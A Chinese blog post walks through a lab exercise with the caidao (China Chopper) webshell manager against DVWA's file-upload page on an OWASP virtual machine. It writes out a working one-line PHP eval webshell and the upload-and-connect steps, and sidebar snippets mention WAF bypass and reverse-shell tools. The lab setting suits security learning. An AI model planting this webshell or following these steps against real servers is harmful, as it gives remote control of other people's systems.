caidao的用法

最新推荐文章于 2024-04-23 22:47:07 发布
最新推荐文章于 2024-04-23 22:47:07 发布
阅读量1k 收藏 2
点赞数
分类专栏: 工具用法 文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45883910/article/details/120756747
版权

工具:owasp虚拟机、caidao、win7 x86系统虚拟机。

环境准备:
下载owasp用VMare打开;(靶机)
win7上下载安装caidao。(攻击机)

  1. 在win7上创建一个1.php文件内容为一句话木马:<?php @eval($_POST[‘cmd’]);?>【这是webshell ,网页后门】
  2. 打开owasp虚拟机,获得IP
  3. 然后在win7上访问此IP,点击DVWA靶场,选择文件上传(low等级),将1.php上传,复制下面上传成功的路径,将网址处#号替换成此路径,进行1.php文件访问(看是否上传成功),将网址全部复制【后面会用到】。
  4. 打开caidao,鼠标右键点击首页空白处,选添加,将上面复制的(URL)网址粘贴进http输入框,后面小框是口令输入cmd(POST后面的参数),点击确认。
  5. 添加成功后,点击相应网页条目即可。
  6. 查看文件。

owasp下载连接
链接:https://pan.baidu.com/s/1DXlV2HmexQABjIwMqXn7lA
提取码:7jnq

Bear :)
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
最新中国菜刀caidao-20160620下载和说明
weixin_33753003的博客
07-18 2037
0x00 中国制造, 黑客之刀 中国菜刀是中国安全圈内使用非常广泛的一款Webshell管理工具,此次老兵大牛进行了更新,界面更加优美,功能更加丰富,有图有真相! 0x01 验证 此次更新还自带了官网验证功能,妈妈再也不会担心我的webshell了。 0x02 软件说明 菜刀 / Caidao @ http://www.maicaidao.com/ ...
BugKu-分析-中国菜刀(两种解法)
渗透、攻防、CTF、编程
07-05 1853
文件caidao.zip,解压后caidao.pcapng 分析两种方法:流量包里导出压缩包和binwalk直接分析文件 方法一:流量包tcp流导出压缩包 搜索http,总共6个流浪包,逐个分析
28.文件上传漏洞和Caidao入门及防御原理(一)1
08-04
声明:本人坚决反对利用教学方法进行犯罪的行为,一切犯罪行为必将受到严惩,绿色网络需要我们共同维护,更推荐大家了解它们背后的原理,更好地进行防护。一.文件上传漏洞
上传漏洞(一句话木马、中国菜刀使用、DVWA文件上传漏洞利用)
qq_53058639的博客
03-16 895
网络安全行业产业以来,随即新增加了几十个网络安全行业岗位︰网络安全专家、网络安全分析师、安全咨询师、网络安全工程师、安全架构师、安全运维工程师、渗透工程师、信息安全管理员、数据安全工程师、网络安全运营工程师、网络安全应急响应工程师、数据鉴定师、网络安全产品经理、网络安全服务工程师、网络安全培训师、网络安全审计员、威胁情报分析工程师、灾难恢复专业人员、实战攻防专业人员…网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。
caidao-20141213.zip
04-10
caidao-20141213.zip
webshell管理工具及其流量特征分析
Goodric的博客
07-22 1353
—对常见四款webshell进行分析,对工具连接流量有个基本认识。——
[渗透&攻防] 三.数据库之差异备份及Caidao利器
热门推荐
杨秀璋的专栏
07-23 1万+
这是最近学习渗透和网站攻防的文章,前面文章从数据库原理解读了防止SQL注入、SQLMAP的基础用法。这篇文章主要讲解数据库知识之差异备份及强大的利器Caidao。希望能深入地学习这部分知识,自己作为一个初学者,在慢慢探索网络攻防和渗透。同时,希望文章对你有所帮助,尤其是学习网络安全的初学者,错误或不足之处还请海涵~ 一.数据库之差异备份 1.差异备份 2.手动上传 二.Caidao基础用法 1.文件管理 2.数据库管理
中国菜刀使用教程
qq1140037586的博客
06-28 1282
中国菜刀使用教程
使用菜刀HTTP流量代理绕过WAF
focus on security
03-17 920
在实际的渗透测试中,Webshell真正免杀的第一步就是确保 Webshell 的源脚本免杀,其次是传输内容的编码混淆。 在实际的渗透过程中,我们常常因为WAF而头疼。源码免杀了而传输层却被拦截了实在难受。虽然现在很多优秀的应用。如蚁剑,C刀,冰蝎等。本文就通过在不修改程序源码,不重复造轮子,代码量最少的前提下实现类似冰蝎的加密传输。 但仅将 request 包内容进行编码,发送到服务器是远远不够的;部分 WAF 或者信息防泄漏系统还会对网页的 response 返回包流量进行检测。这时候,无论源.
python模拟菜刀反弹shell绕过限制【推荐】
09-19
主要介绍了利用python模拟菜刀反弹shell绕过限制,本文给大家介绍的非常详细,具有一定的参考借鉴价值,需要的朋友可以参考下
菜刀webshell流量数据包
08-01
菜刀webshell流量数据包
Xise19.9无视世界WAF.zip_菜刀
09-15
更新日志  生成内页修复生成内页内核,加速生成效率。  生成内页支持新闻采集模式,可选本地新闻或远程新闻。  生成内页支持防删功能。  生成内页支持批量操作,可数千shell不间断生成。...
激光菜刀
02-11
激光菜刀
caidao:golang版本菜鸟级菜刀
05-16
菜鸟级golang菜刀 ...或者直接使用? 到当前目中cmd 执行 caidao.exe (windows) 上传见不得人的小文件 .. 这里就不讨论怎么能通过x洞上传小文件 上传文件 目前我就写了php的版本 cus.php (主要文件) fi
TCP相关问题总结
最新发布
qq_62835094的博客
04-23 1080
假设TCP是两次握手,则可能会发生以下情况客户端发起TCP握手,向服务器发送SYN,但该数据因网络波动滞留此时触发超时重传,重新简历TCP连接当新建立的连接断开后,之前在网络中滞留的SYN连接请求传递到服务端,服务端误以为客户端需要建立TCP连接,因此会发送SYN+ACK请求,并进入连接建立状态,但客户端并不需要建立连接,不会发送数据,因此会造成服务端资源的浪费三次握手可以防止客户端无效连接信息再次到达服务器,导致重新连接之所以需要四次挥手,因为半关闭tcp通道允许双方互相发送数据,数据是双向流动的。
spdlog 日志库部分源码说明——让你可以自定义的指定自动切换日志时间
ALex_zry的博客
04-22 469
针对 网络上spdlog日志库目前存在的使用方式固定,不能发挥这个库本身应有价值的情况,这里对一些支持场景进行说明,以供初学者省去阅读源码的时间,直接上手使用。
webman 事务回滚失效问题记录
juan9872的博客
04-21 721
webman是一款基于workerman开发的高性能HTTP服务框架。webman用于替代传统的php-fpm架构,提供超高性能可扩展的HTTP服务。你可以用webman开发网站,也可以开发HTTP接口或者微服务。除此之外,webman还支持自定义进程,可以做workerman能做的任何事情,例如websocket服务、物联网、游戏、TCP服务、UDP服务、unix socket服务等等。
__HAL_TIM_SET_CAPTUREPOLARIT使用方法
01-04
具体使用方法如下: ```c __HAL_TIM_SET_CAPTUREPOLARIT(htim, Channel, Polarity); ``` 其中,htim是TIM_HandleTypeDef类型的指针,指向要设置的定时器。Channel是要设置的通道号,可以是TIM_CHANNEL_1、TIM_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值